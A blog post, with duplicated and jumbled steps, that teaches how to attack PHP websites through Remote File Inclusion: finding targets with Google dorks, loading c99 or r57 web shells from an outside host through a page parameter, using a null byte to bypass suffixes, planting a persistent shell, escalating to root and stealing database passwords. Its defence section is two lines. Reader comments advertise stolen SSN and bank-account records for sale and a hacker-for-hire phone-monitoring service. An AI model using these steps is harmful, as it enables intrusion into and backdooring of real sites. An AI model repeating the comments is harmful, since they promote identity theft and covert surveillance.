In this Post i will show " How to Exploit RFI Vulnerable Websites ? " ...Read The Steps Carefully And Share the Post if You Like. BUt First You sholud know What Is RFI click here to read the article
1. The First thing you need is to find a website that gets its pages via the PHP include() function and is vulnerable to RFI. You can use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.
2. Website that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName
3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. One would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get out of this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step one(1), I told you that You can use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URL’s with .php?page= in them.
2. Website that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName
3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. One would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get out of this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step one(1), I told you that You can use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URL’s with .php?page= in them.
8. If You succeeds in getting the server to parse the shell, you will be presented with a screen similar to the following as i Got it :-
The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell but
this time Remember to have a .php file so that incase the vulnerability is fixed, you will be able to access it later on.
10. Next, One will try to find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server.
You can Also Search victim server for configuration files which may contain Username, Password for Mysql Database..
How to Protect Yourself From RFI Attacks:-
You can Also Search victim server for configuration files which may contain Username, Password for Mysql Database..
How to Protect Yourself From RFI Attacks:-
1. Make sure you are using Up-to-Date Scripts
2. Make sure you server php.ini file has register_globals and allow_url_fopen disabled.
Hi All!
ReplyDeleteI'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
Headers in Leads:
First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name
*You can ask for sample before any deal
*Each lead will be cost $1
*Premium Lead will be cost $5
*If anyone wants in bulk I will negotiate
*Sampling is just for serious buyers
Hope for the long term deal
For detailed information please contact me on:
Whatsapp > +923172721122
email > leads.sellers1212@gmail.com
telegram > @leadsupplier
ICQ > 752822040
Hello, if you even require a legit hacker to help monitor any cell phone remotely, contact deadlyhacker01@gmail.com or whatsapp: +1 3478577580
ReplyDeleteThey're very reliable.